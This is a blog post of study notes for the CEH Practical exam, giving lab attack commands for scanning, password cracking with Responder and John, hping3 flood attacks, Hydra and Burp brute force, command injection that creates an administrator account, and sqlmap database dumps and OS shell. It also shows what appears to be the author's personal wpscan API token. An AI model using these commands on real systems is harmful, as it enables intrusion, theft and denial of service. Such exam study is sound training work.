CEH Practical Notes

sushil phuyal

8 min readJun 15, 2022

Exam Details

Exam Title: Certified Ethical Hacker (Practical)
Number of Practical Challenges: 20
Duration: 6 hours
Availability: Aspen — iLabs
Test Format: iLabs Cyber Range
Passing Score: 70% (14 Questions)

Exam Tips

Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc.
System hacking, steganography;
Network scanning to identify live and vulnerable machines in a network;
OS banner grabbing, service, and user enumeration;
Different types of cryptography attacks;
SQL injection attacks;
Packet sniffing;

Tools to use

Nmap
Hydra
Sqlmap
Wpscan
Nikto
John
Hashcat
Metasploit
Responder LLMNR
Wireshark or Tcpdump
Steghide
OpenStego
QuickStego
Dirb
Searchsploit
Crunch
Cewl
Veracrypt
Hashcalc
Rainbow Crack

Examples Questions (There are the real issues)

What is the IP of the Windows X machine?
What is the version of the Linux Kernel?
How many Windows machines are there?
What is the password for user X of the FTP server?
What is user X’s IBAN number?
Which user X’s phone number?
What is the password hidden in the .jpeg file?

1. Recon

Host discovery

nmap -sn -PR [IP]
-sn: Disable port scan
-PR: ARP ping scan
nmap -sn -PU [IP]
-PU: UDP ping scan
nmap -sn -PE [IP or IP Range]
-PE: ICMP ECHO ping scan
nmap -sn -PP [IP]
-PP: ICMP timestamp ping scan
nmap -sn -PM [IP]
-PM: ICMP address mask ping scan
nmap -sn -PS [IP]
-PS: TCP SYN Ping scan
nmap -sn -PA [IP]
-PA: TCP ACK Ping scan
nmap -sn -PO [IP]
-PO: IP Protocol Ping scan

Port and Service discovery

nmap -sT -v [IP]
-sT: TCP connect/full open scan
-v: Verbose output
nmap -sS -v [IP]
-sS: Stealth scan/TCP hall-open scan
nmap -sX -v [IP]
-sX: Xmax scan
nmap -sM -v [IP]
-sM: TCP Maimon scan
nmap -sA -v [IP]
-sA: ACK flag probe scan
nmap -sU -v [IP]
-sU: UDP scan
nmap -sI -v [IP]
-sI: IDLE/IPID Header scan
nmap -sY -v [IP]
-sY: SCTP INIT Scan
nmap -sZ -v [IP]
-sZ: SCTP COOKIE ECHO Scan
nmap -sV -v [IP]
-sV: Detect service versions
nmap -A -v [IP]
-A: Aggressive scan

OS discovery

nmap -A -v [IP]
-A: Aggressive scan
nmap -O -v [IP]
-O: OS discovery
nmap –script smb-os-discovery.nse [IP]
-–script: Specify the customized script
smb-os-discovery.nse: Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)

2. Enumeration

Enumerate SNMP using snmp-check

nmap -sU -p 161 [IP]
snmp-check [IP]

Addition

nbtstat -a [IP] (Windows)
nbtstat -c

3. System Hacking

Active Online Attack to Crack the System’s Password using Responder

Linux:

cd
cd Responder
chmox +x ./Responder.py
sudo ./Responder.py -I eth0
passwd: ****

Windows

run
\CEH-Tools

Linux:

Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt
sudo snap install john-the-ripper
passwd: ****
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt

Covert Channels using Covert_TCP

Attacker:

cd Desktop
mkdir Send
cd Send
echo “Secret”->message.txt
Place->Network
Ctrl+L
smb://[IP]
Account & Password
copy and paste covert_tcp.c
cc -o covert_tcp covert_tcp.c

Target:

tcpdump -nvvx port 8888 -I lo
cd Desktop
mkdir Receive
cd Receive
File->Ctrl+L
smb://[IP]
copy and paste covert_tcp.c
cc -o covert_tcp covert_tcp.c
./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt
Tcpdump captures no packets

Attacker

./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt
Wireshark (message string being send in individual packet)

Rainbowcrack and QuickStego

Use Winrtgen to generate a rainbow table
Launch RainbowCrack
File->Load NTLM Hashes from PWDUMP File
Rainbow Table->Search Rainbow Table
Use the generated rainbow table
RainbowCrack automatically starts to crack the hashes
Launch QuickStego
Open Image, and select target .jpg file
Open Text, and select a txt file
Hide text, save image file
Re-launch, Open Image
Select stego file
Hidden text shows up

4. Sniffing

Password sniffing using Wireshark

Attacker

Wireshark

Target

www.moviescope.com
Login

Attacker

Stop capture
File->Save as
Filter: http.request.method==POST
RDP log in Target
service
start Remote Packet Capture Protocol v.0 (experimental)
Log off Target
Wireshark->Capture options->Manage Interface->Remote Interfaces
Add a remote host and its interface
Fill info

Target

Log in
Browse website and log in

Attacker

Get packets

5. Denial-of-service (DOS)

Perform a DoS Attack on a Target Host using hping3

Target:

Wireshark->Ethernet

Attacker

hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood

-S: Set the SYN flag
-a: Spoof the IP address
-p: Specify the destination port
— flood: Send a huge number of packets

Target

Check wireshark

Attacker (Perform PoD)

hping3 -d 65538 -S -p 21 –flood [Target IP]

-d: Specify data size
-S: Set the SYN flag

Attacker (Perform UDP application layer flood attack)

nmap -p 139 10.10.10.19 (check service)
hping3 -2 -p 139 –flood [IP]

Other UDP-based applications and their ports

CharGen UDP Port 19
SNMPv2 UDP Port 161
QOTD UDP Port 17
RPC UDP Port 135
SSDP UDP Port 1900
CLDAP UDP Port 389
TFTP UDP Port 69
NetBIOS UDP Port 137,138,139
NTP UDP Port 123
Quake Network Protocol UDP Port 26000
VoIP UDP Port 5060

6. Hacking Web Servers

Cracking FTP with Dictionary attack

nmap -p 21 [IP]
hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10

Bruteforce via Burp suite

Set proxy for browser: 127.0.0.1:8080
Burpsuite
Type random credentials
capture the request, right click->send to Intrucder
Intruder->Positions
Clear $
Attack type: Cluster bomb
select account and password value, Add $
Payloads: Load wordlist file for set 1 and set 2
start attack
filter status==302
open the raw, get the credentials
recover proxy settings

Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

Log in a website, change the parameter value (id )in the URL
Conduct a XSS attack: Submit script codes via text area

Enumerate and hack a web app using wpscan and metasploit

wpscan — api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads — url http://10.10.10.16:8080/CEH — plugins-detection aggressive — enumerate u
— enumerate u: Specify the enumeration of users
API Token: Register at https://wpscan.com/register
Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE password.txt
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI http://10.10.10.16:8080/CEH
set USERNAME admin
run
Find the credential

Exploit a RCE to compromise a target web server (DVWA Low security)

If found command injection vulnerability in an input textfield
| hostname
| whoami
| tasklist| Taskkill /PID /F
/PID: Process ID value od the process
/F: Forcefully terminate the process
| dir C:\
| net user
| net user user001 /Add
| net user user001
| net localgroup Administrators user001 /Add
Use created account user001 to log in remotely

7. SQL Injection

SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

Login a website
Inspect element
Dev tools->Console: document.cookie
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1" — cookie=”value” –dbs
-u: Specify the target URL
— cookie: Specify the HTTP cookie header value
— dbs: Enumerate DBMS databases
Get a list of databases
Select a database to extract its tables
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1" — cookie=”value” -D moviescope –tables
-D: Specify the DBMS database to enumerate
— tables: Enumerate DBMS database tables
Get a list of tables
Select a column
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1" — cookie=”value” -D moviescope –T User_Login — dump
Get table data of this column
sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1" — cookie=”value” — os-shell
Get the OS Shell
TASKLIST